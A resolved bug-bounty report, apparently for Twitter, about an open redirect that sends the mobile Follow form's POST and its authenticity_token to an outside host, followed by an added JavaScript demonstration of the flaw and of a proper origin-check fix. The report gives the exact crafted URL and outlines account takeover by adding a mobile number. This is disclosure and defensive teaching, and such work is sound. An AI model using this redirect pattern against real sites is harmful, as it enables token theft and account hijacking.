Open Redirect leak of authenticity_token leads to full account takeover.
Vulnerability Details
Hey guys
URL: https://mobile.twitter.com/messages/follow?recipient=/example.com
When I click 'Follow', my POST request is sent to https://example.com,
which contains my authenticity_token,
which can be used for anything like tweeting, following, sending messages, changing username, etc.
It can also be used to add a mobile number, and then steal the account by recovering it via the mobile number.
Thank you.
Report Stats
- Report ID: 49759
- State: Closed
- Substate: resolved
- Upvotes: 5
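The mechanism the report describes, as an added example that is not Twitter's code and not part of the original report: a form action built from the attacker-controlled `recipient` parameter resolves, in the browser, to a foreign origin, so the Follow submission carries the authenticity_token off-site. The builder functions, the "/" prefix, the naive `http` blocklist and the screen-name pattern are assumptions made for illustration; only the URL from the report and the WHATWG URL resolution rules are taken from fact.

```javascript
// Added example (not Twitter's code). Models how a recipient value such as
// "/example.com" turns a relative form action into a cross-origin POST, and
// how a same-origin check stops it. Uses the WHATWG URL class (global in Node
// and browsers), which is also what the browser uses to resolve <form action>.

const SITE_ORIGIN = "https://mobile.twitter.com"; // origin from the report

// Assumed vulnerable builder: prefixes the raw recipient with "/" and lets the
// browser resolve it. "/" + "/example.com" gives "//example.com", which is a
// protocol-relative URL, so the resolved action lives on example.com.
function buildFollowActionVulnerable(recipient) {
  return new URL("/" + recipient, SITE_ORIGIN).href;
}

// Assumed "fix" that only blocklists absolute URLs. It still passes
// "/example.com", so it does not close the hole.
function buildFollowActionBlocklist(recipient) {
  if (/^https?:/i.test(recipient)) return null;
  return new URL("/" + recipient, SITE_ORIGIN).href;
}

// Hardened builder: whitelist the shape of a screen name (assumed pattern),
// then resolve and require that the result stays on SITE_ORIGIN.
function buildFollowActionSafe(recipient) {
  if (!/^[A-Za-z0-9_]{1,15}$/.test(recipient)) return null;
  const url = new URL("/" + recipient, SITE_ORIGIN);
  if (url.origin !== SITE_ORIGIN) return null; // belt and braces
  return url.href;
}

// Simulates the Follow button: the browser POSTs the whole form body,
// authenticity_token included, to whatever host the action resolved to.
function simulateSubmit(action, token) {
  const target = new URL(action);
  return {
    host: target.host,
    leaked: target.origin !== SITE_ORIGIN, // true => token left the site
    body: `authenticity_token=${encodeURIComponent(token)}`,
  };
}

// Constructed inputs: the recipient value from the report plus a benign name.
function demo() {
  const token = "constructed-token-123";
  const out = {};
  for (const recipient of ["/example.com", "jack"]) {
    const vuln = buildFollowActionVulnerable(recipient);
    const block = buildFollowActionBlocklist(recipient);
    const safe = buildFollowActionSafe(recipient);
    out[recipient] = {
      vulnerable: simulateSubmit(vuln, token),
      blocklist: block ? simulateSubmit(block, token) : null,
      safe: safe ? simulateSubmit(safe, token) : null,
    };
  }
  return out;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The point to take from the output is that the blocklist version leaks exactly like the vulnerable one for `/example.com`, while the whitelist-plus-origin check refuses the value and still serves the benign screen name. A real fix should also bind the CSRF token to the session and avoid echoing it into any form whose action is not fixed server-side.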